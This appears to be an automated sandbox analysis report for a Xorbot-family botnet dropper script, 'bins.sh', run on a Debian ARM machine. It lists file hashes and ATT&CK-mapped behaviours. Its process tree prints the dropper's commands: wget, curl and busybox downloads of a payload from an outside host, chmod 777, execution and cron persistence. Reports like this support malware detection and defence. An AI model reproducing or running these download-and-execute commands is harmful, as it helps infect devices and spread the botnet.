Analysis
-
max time kernel
149s -
max time network
161s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
27/02/2025, 18:18
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
ae052a19c0e0a091edd6a9cf7b04fbcf
-
SHA1
8d4bd6f14dbfc3325ecf82587df87c0188a45198
-
SHA256
a2f3a210e7cddc93c3b7d98d9655baec10c4024093dc7aadc464777ac2dee97e
-
SHA512
ee1cf26afa600de9d0eb79365706310bd1ee5b61a0bfa368929d333f502d806423edabebb4254bbc1f31887b4f1761c95b07c8a4c8331d4e124e257d848559e3
-
SSDEEP
192:x+5QqNPJAyA+AdAgAYA4PAyA+AdAgAYAqoL:x+XNPJdpmnfTPdpmnf0
Malware Config
Signatures
-
resource yara_rule behavioral2/files/fstream-1.dat family_xorbot -
Xorbot family
-
Contacts a large (2149) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 701 chmod -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb 703 bins.sh -
Renames itself 1 IoCs
pid Process 704 v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.JlRWn5 crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/795/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/802/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/803/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/280/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/806/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/910/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/930/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/980/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/2/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/20/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/872/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/900/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/904/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/915/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/937/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/976/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/14/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/738/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/995/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/42/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/756/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/858/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/864/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/874/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/876/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/962/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/742/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/885/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/892/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/284/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/43/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/744/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/751/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/762/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/791/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/792/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/857/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/303/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/649/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/659/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/860/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/869/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/942/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/943/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/968/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/760/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/777/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/998/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/790/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/946/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/313/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/720/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/757/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/804/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/781/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/917/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/filesystems crontab File opened for reading /proc/168/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/819/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/850/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/878/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/924/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/938/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb File opened for reading /proc/971/cmdline v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 665 wget 680 curl 697 busybox 725 wget -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb wget File opened for modification /tmp/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb curl File opened for modification /tmp/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵
- Executes dropped EXE
PID:656 -
/bin/rm/bin/rm bins.sh2⤵PID:661
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:665
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb2⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
PID:680
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:697
-
-
/bin/chmodchmod 777 v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb2⤵
- File and Directory Permissions Modification
PID:701
-
-
/tmp/v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb./v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb2⤵
- Renames itself
- Reads runtime system information
PID:703 -
/bin/shsh -c "crontab -l"3⤵PID:705
-
/usr/bin/crontabcrontab -l4⤵
- Reads runtime system information
PID:706
-
-
-
/bin/shsh -c "crontab -"3⤵PID:708
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:709
-
-
-
-
/bin/rmrm v93a7Hy7m9Q3jPGN7Qi65nIFDUlDC9GoLb2⤵PID:722
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tZq2pUucDTcfj0bOnDclqm8m0Nt4dvZC732⤵
- System Network Configuration Discovery
PID:725
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
127KB
MD589077b7bd4bcafca7713be43635c4862
SHA1fc02edb8fba29ea8ee99e6157ef8560334530052
SHA25678416feab0c93152d65acc8f48835520db083cc3aed0aea622b9fb88284dc00d
SHA5121b457b8f8d452eecaad9013241e50672befb70feb5349f5fa72d62ea1fa8affa968763e6511cc76cdc5bf12f080e4a8f10c8e141ccd0d36794e721d690f2c4b1
-
Filesize
210B
MD5b572864d9b4137932c3c9cfdb51f46e4
SHA18e5589d5ea7fbffbc1824760659e20f084f8610f
SHA2566ab19ccf41ba034809a720f584d1f061be4e053805804d6d5c4bb882f5461739
SHA512c83a6a1f6914c68b9d1956d9c24b22d5d33400516da13f41b17029e4da93e5686801df7efd1fec7df8a97c30b30ab823928ac7bb9870acc769239deb2a7391d7